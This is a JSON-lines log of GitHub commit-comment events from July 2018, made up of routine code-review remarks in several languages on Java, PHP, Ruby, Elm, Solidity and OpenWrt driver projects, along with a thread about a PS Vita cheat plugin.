{"id":"7918996270","type":"CommitCommentEvent","actor":{"login":"Dimensional"},"repo":{"name":"ShumnoT/VitaCheatDatabase"},"payload":{"comment":{"id":29596800,"position":null,"line":null,"path":null,"commit_id":"fd964f3239ccf1b772e5d8543b30101565f6aa26","created_at":"2018-07-04T15:04:30Z","updated_at":"2018-07-04T15:04:30Z","author_association":"NONE","body":"Yes. Those are known to happen too with any game using the plugin. Best\nto disable cheats until you get past the blitzball tournament.\n\n\nOn 7/4/2018 10:01 AM, kirasento wrote:\n>\n> Yes just got it working....after left besaid the game freezes rip FFX 😭\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ShumnoT/VitaCheatDatabase/commit/fd964f3239ccf1b772e5d8543b30101565f6aa26#commitcomment-29596771>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEy14b6EJRLW8nThqIwSR0Je7jhHRLIdks5uDNjcgaJpZM4Qf89s>.\n>\n\n\n\n---\nThis email has been checked for viruses by Avast antivirus software.\nhttps://www.avast.com/antivirus\n"}},"created_at":"2018-07-04T15:04:30Z"}
{"id":"7918997057","type":"CommitCommentEvent","actor":{"login":"mrstegeman"},"repo":{"name":"mozilla-iot/webthing-node"},"payload":{"comment":{"id":29596802,"position":15,"line":27,"path":"lib/thing.js","commit_id":"82d5266393fac2eedc6f44356ae0868b8640a166","created_at":"2018-07-04T15:04:40Z","updated_at":"2018-07-04T15:04:40Z","author_association":"CONTRIBUTOR","body":"That site isn't actually live yet. Right now, the schemas are in a Google Doc, but hopefully we'll get those moved somewhere more public soon.\r\n\r\n@benfrancis Do we have any plans to do this soon?"}},"created_at":"2018-07-04T15:04:40Z"}
{"id":"7919002036","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29596816,"position":1,"line":7,"path":"src/main/java/com/agurova/dal/ImageRepo.java","commit_id":"7b82a74db0f0dcd52be0379487e9d9e0f8363b5e","created_at":"2018-07-04T15:05:38Z","updated_at":"2018-07-04T15:05:38Z","author_association":"COLLABORATOR","body":"Не экономь место в названии классов, смело можно(нужно) менять ~Repo на ~Repository"}},"created_at":"2018-07-04T15:05:38Z"}
{"id":"7919002152","type":"CommitCommentEvent","actor":{"login":"cooscreations"},"repo":{"name":"cooscreations/prrpss-demo"},"payload":{"comment":{"id":29596817,"position":null,"line":null,"path":null,"commit_id":"fef28c5115adfd60325f97397a252e9d6438f05e","created_at":"2018-07-04T15:05:39Z","updated_at":"2018-07-04T15:05:39Z","author_association":"OWNER","body":"Uploading this was a complete rookie mistake hahahaha\r\n\r\nI will update the DB connection details immediately and then hit my head against a wall >_<"}},"created_at":"2018-07-04T15:05:39Z"}
{"id":"7919003143","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29596819,"position":1,"line":7,"path":"src/main/java/com/agurova/dal/UserRepo.java","commit_id":"7b82a74db0f0dcd52be0379487e9d9e0f8363b5e","created_at":"2018-07-04T15:05:51Z","updated_at":"2018-07-04T15:05:51Z","author_association":"COLLABORATOR","body":"Не экономь место в названии классов, смело можно(нужно) менять ~Repo на ~Repository"}},"created_at":"2018-07-04T15:05:51Z"}
{"id":"7919004298","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29596820,"position":18,"line":18,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-04T15:06:05Z","updated_at":"2018-07-04T15:06:05Z","author_association":"NONE","body":"Проверь названия переменных"}},"created_at":"2018-07-04T15:06:05Z"}
{"id":"7919006470","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29596828,"position":29,"line":25,"path":"src/main/java/com/agurova/dal/impl/ImageRepoImpl.java","commit_id":"7b82a74db0f0dcd52be0379487e9d9e0f8363b5e","created_at":"2018-07-04T15:06:32Z","updated_at":"2018-07-04T15:06:32Z","author_association":"COLLABORATOR","body":"А нужнали на операции чтения из БД транзакция?"}},"created_at":"2018-07-04T15:06:32Z"}
{"id":"7919010262","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29596831,"position":null,"line":null,"path":null,"commit_id":"de4c0fe658d53c973d36e30f55ee03b6f3ba060f","created_at":"2018-07-04T15:07:18Z","updated_at":"2018-07-04T15:07:18Z","author_association":"COLLABORATOR","body":"@thomasmari \r\nSo you are using 3 trigger modules, right ?\r\nI think these phase-type results will be useless if it is doable with a single trigger module.\r\nOne could argue that it can be done with better precision and in less time with just one trigger module.\r\nAnd I believe it is doable with just a single trigger module, as I have commented on your previous commit (and emailed you).\r\n\r\nBy the way, did you fix your laptop? :D "}},"created_at":"2018-07-04T15:07:18Z"}
{"id":"7919011798","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29596835,"position":29,"line":25,"path":"src/main/java/com/agurova/dal/impl/ImageRepoImpl.java","commit_id":"7b82a74db0f0dcd52be0379487e9d9e0f8363b5e","created_at":"2018-07-04T15:07:37Z","updated_at":"2018-07-04T15:07:37Z","author_association":"COLLABORATOR","body":"Задай себе этот вопрос относительно остальных методов)"}},"created_at":"2018-07-04T15:07:37Z"}
{"id":"7919013185","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29596837,"position":25,"line":23,"path":"src/main/java/com/agurova/dal/impl/UserRepoImpl.java","commit_id":"7b82a74db0f0dcd52be0379487e9d9e0f8363b5e","created_at":"2018-07-04T15:07:53Z","updated_at":"2018-07-04T15:07:53Z","author_association":"COLLABORATOR","body":"А нужнали на операции чтения из БД транзакция?"}},"created_at":"2018-07-04T15:07:53Z"}
{"id":"7919013679","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29596839,"position":11,"line":11,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T15:07:59Z","updated_at":"2018-07-04T15:07:59Z","author_association":"NONE","body":"blz"}},"created_at":"2018-07-04T15:07:59Z"}
{"id":"7919013841","type":"CommitCommentEvent","actor":{"login":"kirasento"},"repo":{"name":"ShumnoT/VitaCheatDatabase"},"payload":{"comment":{"id":29596840,"position":null,"line":null,"path":null,"commit_id":"fd964f3239ccf1b772e5d8543b30101565f6aa26","created_at":"2018-07-04T15:08:01Z","updated_at":"2018-07-04T15:08:01Z","author_association":"NONE","body":"I see....rip have to start all over again thanks for the help"}},"created_at":"2018-07-04T15:08:01Z"}
{"id":"7919016789","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29596843,"position":9,"line":9,"path":"index.php","commit_id":"fd173135d6c75ec75fd90e17e76ba10e2276c73c","created_at":"2018-07-04T15:08:33Z","updated_at":"2018-07-04T15:08:33Z","author_association":"NONE","body":"В названии классов используй CamelCase"}},"created_at":"2018-07-04T15:08:33Z"}
{"id":"7919017305","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29596845,"position":3,"line":3,"path":"src/main/java/com/agurova/models/Image.java","commit_id":"7b82a74db0f0dcd52be0379487e9d9e0f8363b5e","created_at":"2018-07-04T15:08:39Z","updated_at":"2018-07-04T15:08:39Z","author_association":"COLLABORATOR","body":"Code style. Лишние строки. Должна быть одна."}},"created_at":"2018-07-04T15:08:39Z"}
{"id":"7919017433","type":"CommitCommentEvent","actor":{"login":"dmaterowski"},"repo":{"name":"Microsoft/botbuilder-dotnet"},"payload":{"comment":{"id":29596846,"position":null,"line":null,"path":null,"commit_id":"fc266e378a8c4e3d97eb2b19b68d600b0183e4d6","created_at":"2018-07-04T15:08:40Z","updated_at":"2018-07-04T15:08:40Z","author_association":"NONE","body":"@johnataylor I really like this change but all the docs use middleware in samples making it now quite confusing"}},"created_at":"2018-07-04T15:08:40Z"}
{"id":"7919019500","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29596849,"position":85,"line":85,"path":"Assets/Scritpt/Gameplay/ControlePause.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T15:09:05Z","updated_at":"2018-07-04T15:09:05Z","author_association":"NONE","body":"Se for um nome muito comum de ser usado, não tem problema não :)"}},"created_at":"2018-07-04T15:09:05Z"}
{"id":"7919021248","type":"CommitCommentEvent","actor":{"login":"dstogov"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29596856,"position":null,"line":null,"path":null,"commit_id":"d84ef967424343abcc48b8f945d5e7807f1c1e09","created_at":"2018-07-04T15:09:24Z","updated_at":"2018-07-04T15:09:24Z","author_association":"CONTRIBUTOR","body":"@Majkl578 this worked because of the bug, and it wasn't intended.\r\nI'll fix the error message."}},"created_at":"2018-07-04T15:09:24Z"}
{"id":"7919021338","type":"CommitCommentEvent","actor":{"login":"qysf"},"repo":{"name":"qysf/testgit"},"payload":{"comment":{"id":29596857,"position":5,"line":3,"path":"readme.txt","commit_id":"2a74970e376133880529a2e6d2fc1b43262edf3e","created_at":"2018-07-04T15:09:26Z","updated_at":"2018-07-04T15:09:26Z","author_association":"OWNER","body":"byb"}},"created_at":"2018-07-04T15:09:26Z"}
{"id":"7919024292","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29596864,"position":18,"line":17,"path":"src/main/java/com/agurova/models/Image.java","commit_id":"7b82a74db0f0dcd52be0379487e9d9e0f8363b5e","created_at":"2018-07-04T15:10:01Z","updated_at":"2018-07-04T15:10:01Z","author_association":"COLLABORATOR","body":"Code style. Много лишних строк."}},"created_at":"2018-07-04T15:10:01Z"}
{"id":"7919030075","type":"CommitCommentEvent","actor":{"login":"kondasuresh"},"repo":{"name":"kondasuresh/gitrepo"},"payload":{"comment":{"id":29596886,"position":null,"line":null,"path":null,"commit_id":"fa85a388fae08f4560098ce04af5e076e0017024","created_at":"2018-07-04T15:11:10Z","updated_at":"2018-07-04T15:11:10Z","author_association":"OWNER","body":"how to connect serevers for demo"}},"created_at":"2018-07-04T15:11:10Z"}
{"id":"7919032330","type":"CommitCommentEvent","actor":{"login":"majoch"},"repo":{"name":"islahate/template_islahate"},"payload":{"comment":{"id":29596893,"position":null,"line":null,"path":null,"commit_id":"d639f48fd774cd7391b53098cebfdd17f5840abd","created_at":"2018-07-04T15:11:36Z","updated_at":"2018-07-04T15:11:36Z","author_association":"CONTRIBUTOR","body":"comment"}},"created_at":"2018-07-04T15:11:36Z"}
{"id":"7919038918","type":"CommitCommentEvent","actor":{"login":"dstogov"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29596907,"position":null,"line":null,"path":null,"commit_id":"d84ef967424343abcc48b8f945d5e7807f1c1e09","created_at":"2018-07-04T15:12:51Z","updated_at":"2018-07-04T15:12:51Z","author_association":"CONTRIBUTOR","body":"@nikic right? RFC didn't say anything about non integer/string keys."}},"created_at":"2018-07-04T15:12:51Z"}
{"id":"7919040862","type":"CommitCommentEvent","actor":{"login":"eyal0"},"repo":{"name":"syue87/GCodeAnalyser"},"payload":{"comment":{"id":29596910,"position":4,"line":953,"path":"js/gcodeProcessor.js","commit_id":"627b792dc84ef70c2083103c7d2fce0debd7e8bd","created_at":"2018-07-04T15:13:14Z","updated_at":"2018-07-04T15:13:14Z","author_association":"CONTRIBUTOR","body":"Why remove this?  It's correct.\r\n\r\nhttp://marlinfw.org/docs/gcode/G090.html\r\n\r\nI think that you should leave this G90 case and G91 case in place."}},"created_at":"2018-07-04T15:13:14Z"}
{"id":"7919046133","type":"CommitCommentEvent","actor":{"login":"Coduz"},"repo":{"name":"andrejn-ct/kapua"},"payload":{"comment":{"id":29596927,"position":null,"line":null,"path":null,"commit_id":"2eced1bcae795aefed2d2389abd32707f79376ad","created_at":"2018-07-04T15:14:18Z","updated_at":"2018-07-04T15:14:18Z","author_association":"NONE","body":"Hi Andrej, \r\n\r\nLooks good! \r\n\r\nOnly problem I see is:\r\n- A `NullPointerException` when checking for `serviceEvent==null`, log message and then do not return or throw an exception. I don't know if it is better to throw an exception or add `else` statement to the `if`.\r\n- I would move the javadoc to the main `ServiceEventConstants` instead of having it dullicated. Moreover in the classes with more than one service mapped (e.g. `AuthorizationServicesConstants`) that will result as the documentation of the first value mapped, instead being the javadoc of the class itself.\r\n\r\nRegards, \r\n\r\n_Alberto_"}},"created_at":"2018-07-04T15:14:18Z"}
{"id":"7919047397","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"salesking/sepa_king"},"payload":{"comment":{"id":29596936,"position":9,"line":8,"path":"lib/sepa_king/transaction/credit_transfer_transaction.rb","commit_id":"4a1aaaa2312857216a915b95cc3f232f5492d0c7","created_at":"2018-07-04T15:14:33Z","updated_at":"2018-07-04T15:14:33Z","author_association":"NONE","body":"Just happened to see this while browsing the code. In a Ruby on Rails context, I believe `Date.today` will be in the server time zone, and `Date.current` will be in the app time zone. They could differ. Could it make sense to use `Date.current` when available, since Rails is so commonly used?"}},"created_at":"2018-07-04T15:14:33Z"}
{"id":"7919056495","type":"CommitCommentEvent","actor":{"login":"eduperez"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29596944,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-04T15:16:25Z","updated_at":"2018-07-04T15:16:25Z","author_association":"NONE","body":"This path is failing to compile for LEDE 17.01.4, with an error of \"`too many arguments to function 'nla_parse'`\" at line 44 of \"`vendor_cmd.c`\" (the last \"`NULL`\" parameter seems unneded), but compiles fine for LEDE 18.06.0-RC1."}},"created_at":"2018-07-04T15:16:25Z"}
{"id":"7919059360","type":"CommitCommentEvent","actor":{"login":"danielburnley"},"repo":{"name":"georgeschena/tennisKata"},"payload":{"comment":{"id":29596953,"position":47,"line":47,"path":"lib/tennis.rb","commit_id":"e4538a7ec217d98a9eb55d9f1a4e379b1b4b4c0a","created_at":"2018-07-04T15:16:57Z","updated_at":"2018-07-04T15:16:57Z","author_association":"NONE","body":"When first reading this I was confused as to why you were calling `diff` in each method, and found it slightly harder to follow\r\n\r\nYou could avoid having to call this each time by instead having the `diff` method return `@player1 - @player2`, rather than setting `@diff` and using that further down "}},"created_at":"2018-07-04T15:16:57Z"}
{"id":"7919060354","type":"CommitCommentEvent","actor":{"login":"bugan"},"repo":{"name":"bugan/FugaEspacial_UnityMobile"},"payload":{"comment":{"id":29596955,"position":21,"line":21,"path":"Assets/Scritpt/Gameplay/MovimentoOscilatorio.cs","commit_id":"a96069b98bddf1a1c4fe6dace3a01559530575d4","created_at":"2018-07-04T15:17:10Z","updated_at":"2018-07-04T15:17:10Z","author_association":"OWNER","body":"Na verdade não, pq eu estou pegando a posição do objeto assim que o jogo foi iniciado. Assim conseguimos mudar a posição dele no editor e o código vai usar a posição definida pelo game designer"}},"created_at":"2018-07-04T15:17:10Z"}
{"id":"7919061743","type":"CommitCommentEvent","actor":{"login":"SebAshton"},"repo":{"name":"georgeschena/tennisKata"},"payload":{"comment":{"id":29596958,"position":34,"line":34,"path":"lib/tennis.rb","commit_id":"e4538a7ec217d98a9eb55d9f1a4e379b1b4b4c0a","created_at":"2018-07-04T15:17:26Z","updated_at":"2018-07-04T15:17:26Z","author_association":"NONE","body":"Is it always the case that `no_special_cases` will be true if not advantage, deuce, or a winner? We could omit the logic statement if we feel it doesn't detract from comprehension"}},"created_at":"2018-07-04T15:17:26Z"}
{"id":"7919063491","type":"CommitCommentEvent","actor":{"login":"beaglebao"},"repo":{"name":"beaglebao/exercise"},"payload":{"comment":{"id":29596962,"position":null,"line":null,"path":null,"commit_id":"668c2a5a4d37c43cf3e035badd531950d2ebc371","created_at":"2018-07-04T15:17:48Z","updated_at":"2018-07-04T15:17:48Z","author_association":"OWNER","body":"hello world"}},"created_at":"2018-07-04T15:17:48Z"}
{"id":"7919069485","type":"CommitCommentEvent","actor":{"login":"danielburnley"},"repo":{"name":"georgeschena/tennisKata"},"payload":{"comment":{"id":29596970,"position":3,"line":3,"path":"spec/spec_helper.rb","commit_id":"e4538a7ec217d98a9eb55d9f1a4e379b1b4b4c0a","created_at":"2018-07-04T15:19:01Z","updated_at":"2018-07-04T15:19:01Z","author_association":"NONE","body":"I'd delete all the autogenerated comments, they mainly just add noise and make it harder to actually read what's configured within here"}},"created_at":"2018-07-04T15:19:01Z"}
{"id":"7919071938","type":"CommitCommentEvent","actor":{"login":"SebAshton"},"repo":{"name":"georgeschena/tennisKata"},"payload":{"comment":{"id":29596977,"position":47,"line":47,"path":"lib/tennis.rb","commit_id":"e4538a7ec217d98a9eb55d9f1a4e379b1b4b4c0a","created_at":"2018-07-04T15:19:30Z","updated_at":"2018-07-04T15:19:30Z","author_association":"NONE","body":"Could we recalculate the `diff` after every score to dry this up?"}},"created_at":"2018-07-04T15:19:30Z"}
{"id":"7919072090","type":"CommitCommentEvent","actor":{"login":"p3x-robot"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29596978,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-04T15:19:32Z","updated_at":"2018-07-04T15:19:32Z","author_association":"NONE","body":"yes, i found it, that on 17.01.4 is building, but on latest OpenWrt tag 18 is not building. For now, I reverted the original settings in the OpenWrt tag. I guess by the time OpenWrt be like a few source service packages later,  we will do not have to rebuild every comment."}},"created_at":"2018-07-04T15:19:32Z"}
{"id":"7919077935","type":"CommitCommentEvent","actor":{"login":"kondasuresh"},"repo":{"name":"kondasuresh/gitrepo"},"payload":{"comment":{"id":29596997,"position":null,"line":null,"path":null,"commit_id":"fa85a388fae08f4560098ce04af5e076e0017024","created_at":"2018-07-04T15:20:41Z","updated_at":"2018-07-04T15:20:41Z","author_association":"OWNER","body":"#gitrepo\r\nDemo purpose, this is used for storing all the demo related files."}},"created_at":"2018-07-04T15:20:41Z"}
{"id":"7919078379","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29597001,"position":null,"line":null,"path":null,"commit_id":"b3506227d6bd919d4b12e71c65016061687612ea","created_at":"2018-07-04T15:20:47Z","updated_at":"2018-07-04T15:20:47Z","author_association":"OWNER","body":"`clean` shouldn't create anything (i.e. never call `mkdir`). So I think you should delete all of those calls to `mkdir`. You should indicate that those lines (with the `cd`) can fail, i.e. prefix them with `- `."}},"created_at":"2018-07-04T15:20:47Z"}
{"id":"7919078844","type":"CommitCommentEvent","actor":{"login":"danielburnley"},"repo":{"name":"georgeschena/tennisKata"},"payload":{"comment":{"id":29597002,"position":48,"line":48,"path":"lib/tennis.rb","commit_id":"e4538a7ec217d98a9eb55d9f1a4e379b1b4b4c0a","created_at":"2018-07-04T15:20:52Z","updated_at":"2018-07-04T15:20:52Z","author_association":"NONE","body":"you could move these into two methods such as `player1_has_advantage?` and `player2_has_advantage?` - imo it makes it slightly easier to read than doing comparisons and makes it clearer to the reader what is being checked"}},"created_at":"2018-07-04T15:20:52Z"}
{"id":"7919082263","type":"CommitCommentEvent","actor":{"login":"radumas"},"repo":{"name":"CityofToronto/bdit_data-sources"},"payload":{"comment":{"id":29597010,"position":17,"line":79,"path":"ttc/cis_processing.md","commit_id":"3898e013a17a4a19c0fef11c6f31c659094afdb7","created_at":"2018-07-04T15:21:33Z","updated_at":"2018-07-04T15:21:33Z","author_association":"MEMBER","body":"@chelsrosic can you add a comment here explaining what this does?"}},"created_at":"2018-07-04T15:21:33Z"}
{"id":"7919083418","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29597013,"position":null,"line":null,"path":null,"commit_id":"de1e9f5f8e38b4719fe49217fa6de3ab993225e8","created_at":"2018-07-04T15:21:48Z","updated_at":"2018-07-04T15:21:48Z","author_association":"OWNER","body":":+1:"}},"created_at":"2018-07-04T15:21:48Z"}
{"id":"7919084728","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29597019,"position":null,"line":null,"path":null,"commit_id":"b3506227d6bd919d4b12e71c65016061687612ea","created_at":"2018-07-04T15:22:04Z","updated_at":"2018-07-04T15:22:04Z","author_association":"COLLABORATOR","body":"Will do - I tried putting the `-` in front of `stack clean` and it didn't work. Didn't think to put it at the beginning of the whole line 😄 "}},"created_at":"2018-07-04T15:22:04Z"}
{"id":"7919084854","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29597020,"position":11,"line":51,"path":"contracts/Splitter.sol","commit_id":"18138fd8da61fe6e4d651bc78337df5feedca2e7","created_at":"2018-07-04T15:22:06Z","updated_at":"2018-07-04T15:22:06Z","author_association":"NONE","body":"Perhaps, eventually, `.transfer` will be updated so that `to.transfer(funds, \"Failed to transfer funds\");` becomes valid."}},"created_at":"2018-07-04T15:22:06Z"}
{"id":"7919086491","type":"CommitCommentEvent","actor":{"login":"destiny5420"},"repo":{"name":"destiny5420/King-and-Apples"},"payload":{"comment":{"id":29597025,"position":null,"line":null,"path":null,"commit_id":"b2ecddcbe625448ca46ab951be1f1bb97e346e28","created_at":"2018-07-04T15:22:27Z","updated_at":"2018-07-04T15:22:27Z","author_association":"OWNER","body":"This is good **FUNCTION** , good for you  \r\n> 1. You can do it to best than this !"}},"created_at":"2018-07-04T15:22:27Z"}
{"id":"7919088526","type":"CommitCommentEvent","actor":{"login":"danielburnley"},"repo":{"name":"georgeschena/tennisKata"},"payload":{"comment":{"id":29597032,"position":null,"line":null,"path":null,"commit_id":"e4538a7ec217d98a9eb55d9f1a4e379b1b4b4c0a","created_at":"2018-07-04T15:22:51Z","updated_at":"2018-07-04T15:22:51Z","author_association":"NONE","body":"The only other question I'd have is what about cases where youve got the deuce->adv->deuce->adv loop going on (causing every other program on BBC1 to be delayed) so player 1 and 2 have an overall score of 10 each, but the game is still at a deuce "}},"created_at":"2018-07-04T15:22:51Z"}
{"id":"7919091562","type":"CommitCommentEvent","actor":{"login":"jgrenat"},"repo":{"name":"NGRP/node-red-viseo-bot-dashboard"},"payload":{"comment":{"id":29597041,"position":18,"line":18,"path":"client/my-app/src/Codec/ConversationHeader.elm","commit_id":"0e8106475723a1375dfa36699ae15301b78b6d0f","created_at":"2018-07-04T15:23:26Z","updated_at":"2018-07-04T15:23:26Z","author_association":"COLLABORATOR","body":"La convention en Elm est plutôt d'utiliser du camelCase, et pour le coup je pense qu'il vaudrait mieux parser la Date que la laisser en String, ne serait-ce que pour vérifier son format. L'idée est d'avoir quelque chose de secure dans l'application. \r\n\r\nDe même, le messageStatus devrait être un union type."}},"created_at":"2018-07-04T15:23:26Z"}
{"id":"7919121547","type":"CommitCommentEvent","actor":{"login":"gsmet"},"repo":{"name":"hibernate/hibernate-orm"},"payload":{"comment":{"id":29597119,"position":33,"line":163,"path":"hibernate-core/src/test/java/org/hibernate/jpa/test/lock/LockTest.java","commit_id":"6b3e4e6f56771dd2955a42a4830a44bd56899e70","created_at":"2018-07-04T15:29:55Z","updated_at":"2018-07-04T15:29:55Z","author_association":"MEMBER","body":"@vladmihalcea do we really want to ignore failures here? I mean: if we break something, we won't notice it.\r\n\r\nI'm probably missing something but it looks scary."}},"created_at":"2018-07-04T15:29:55Z"}
{"id":"7919122658","type":"CommitCommentEvent","actor":{"login":"the349"},"repo":{"name":"the349/NICE"},"payload":{"comment":{"id":29597123,"position":null,"line":null,"path":null,"commit_id":"724687f929246d5152c494a8e1b9169714817a58","created_at":"2018-07-04T15:30:11Z","updated_at":"2018-07-04T15:30:11Z","author_association":"OWNER","body":"upload help icon"}},"created_at":"2018-07-04T15:30:11Z"}
{"id":"7919126262","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29597134,"position":6,"line":125,"path":"assembl/graphql/docstrings.py","commit_id":"80660318509ce5deb0f56b0e0b1604562716062b","created_at":"2018-07-04T15:30:53Z","updated_at":"2018-07-04T15:30:53Z","author_association":"MEMBER","body":"Be more descriptive on what a Synthesis is with a `__doc__` field. Explain what a synthesis is, that it has a introduction, conclusion, etc. When it is usually done, etc. This is the behaviour of what our platform does...."}},"created_at":"2018-07-04T15:30:53Z"}
{"id":"7919127070","type":"CommitCommentEvent","actor":{"login":"brunolimadevelopment"},"repo":{"name":"I9ME/landing-apps"},"payload":{"comment":{"id":29597135,"position":null,"line":null,"path":null,"commit_id":"79fc0db3cf98f283fc5167c05339fed18a0da498","created_at":"2018-07-04T15:31:03Z","updated_at":"2018-07-04T15:31:03Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [LANDING PAGE - APLICATIVOS](https://trello.com/c/C4sMQSbG/9-landing-page-aplicativos)"}},"created_at":"2018-07-04T15:31:03Z"}
{"id":"7919127193","type":"CommitCommentEvent","actor":{"login":"brunolimadevelopment"},"repo":{"name":"I9ME/landing-apps"},"payload":{"comment":{"id":29597136,"position":null,"line":null,"path":null,"commit_id":"79fc0db3cf98f283fc5167c05339fed18a0da498","created_at":"2018-07-04T15:31:04Z","updated_at":"2018-07-04T15:31:04Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [LANDING PAGE - APLICATIVOS](https://trello.com/c/C4sMQSbG/9-landing-page-aplicativos)"}},"created_at":"2018-07-04T15:31:04Z"}
{"id":"7919128296","type":"CommitCommentEvent","actor":{"login":"aoroberson"},"repo":{"name":"ikathegreat/roicalc"},"payload":{"comment":{"id":29597141,"position":null,"line":null,"path":null,"commit_id":"ee49ff60f4d9011b61fa4fb4669eb48fcf6fd15b","created_at":"2018-07-04T15:31:18Z","updated_at":"2018-07-04T15:31:18Z","author_association":"COLLABORATOR","body":"- Made all bound properties observable.\r\n- Made all commands single instance to prevent memory issues. \r\n- Removed some observable properties and moved to xaml object bindings with converters.\r\n- Added regions and general reorganization."}},"created_at":"2018-07-04T15:31:18Z"}
{"id":"7919129938","type":"CommitCommentEvent","actor":{"login":"MSP-Greg"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29597145,"position":null,"line":null,"path":null,"commit_id":"df4a126d65e4690e9301392974fcc9adf7d4c474","created_at":"2018-07-04T15:31:39Z","updated_at":"2018-07-04T15:31:39Z","author_association":"NONE","body":"@nurse\r\n\r\nThis has been 'interesting'.  I think it was actually [r63820 get rid of a compiler warning of VC](https://github.com/ruby/ruby/commit/dea842299275d051d15d64eb9061b88fed89ebac) that caused the mswin build to lock during test-all, as seen here on [Appveyor](https://ci.appveyor.com/project/ruby/ruby/build/1.0.8754).  It was passing as of the previous commit, r63816.  This (obviously) could mask other issues.\r\n\r\nThen, the issue with test/ruby/test_time_tz.rb, which was fixed by r63839.  Also, see [Bug #14890](https://bugs.ruby-lang.org/issues/14890).\r\n\r\nRe ruby-loco (mingw), the mjit tests are failing, but that's happened before and gotten sorted out.\r\n\r\nHence, it would be interesting to see if this was reverted **except for r63820**, and see how mswin does...\r\n\r\nBut, that might be kind of a PITA... Thanks, Greg"}},"created_at":"2018-07-04T15:31:39Z"}
{"id":"7919130612","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29597149,"position":13,"line":132,"path":"assembl/graphql/docstrings.py","commit_id":"80660318509ce5deb0f56b0e0b1604562716062b","created_at":"2018-07-04T15:31:47Z","updated_at":"2018-07-04T15:31:47Z","author_association":"MEMBER","body":"When using `ideas`, instead, think that they are objects, so use `Ideas` instead. Same thing for `Synthesis`."}},"created_at":"2018-07-04T15:31:47Z"}
{"id":"7919131627","type":"CommitCommentEvent","actor":{"login":"Ogoe1"},"repo":{"name":"andersonaddo/Generic-Inventory-Manager"},"payload":{"comment":{"id":29597153,"position":null,"line":null,"path":null,"commit_id":"65872d76e6c362be9f9711d89bfd2d31e3187c46","created_at":"2018-07-04T15:32:01Z","updated_at":"2018-07-04T15:32:01Z","author_association":"COLLABORATOR","body":"What exactly did you change here?"}},"created_at":"2018-07-04T15:32:01Z"}
{"id":"7919133444","type":"CommitCommentEvent","actor":{"login":"spl237"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29597155,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T15:32:25Z","updated_at":"2018-07-04T15:32:25Z","author_association":"CONTRIBUTOR","body":" No problem - now I have the database, it's easy enough to put in handling for arbitrary remappings. Without the data, it was a bit pointless to handle one-off exceptions (as I would doubtless have missed numerous others...), but now I'm just going to port the data in that file into a lookup table and write a simple remap function, and as it seems that \"us\" is pretty much the only alternative I need to offer to national keyboards, I'll add a checkbox for that. I'll make \"us\" with no variant the default for NL.\r\n\r\nMany thanks again for pointing me at the right place to find it!"}},"created_at":"2018-07-04T15:32:25Z"}
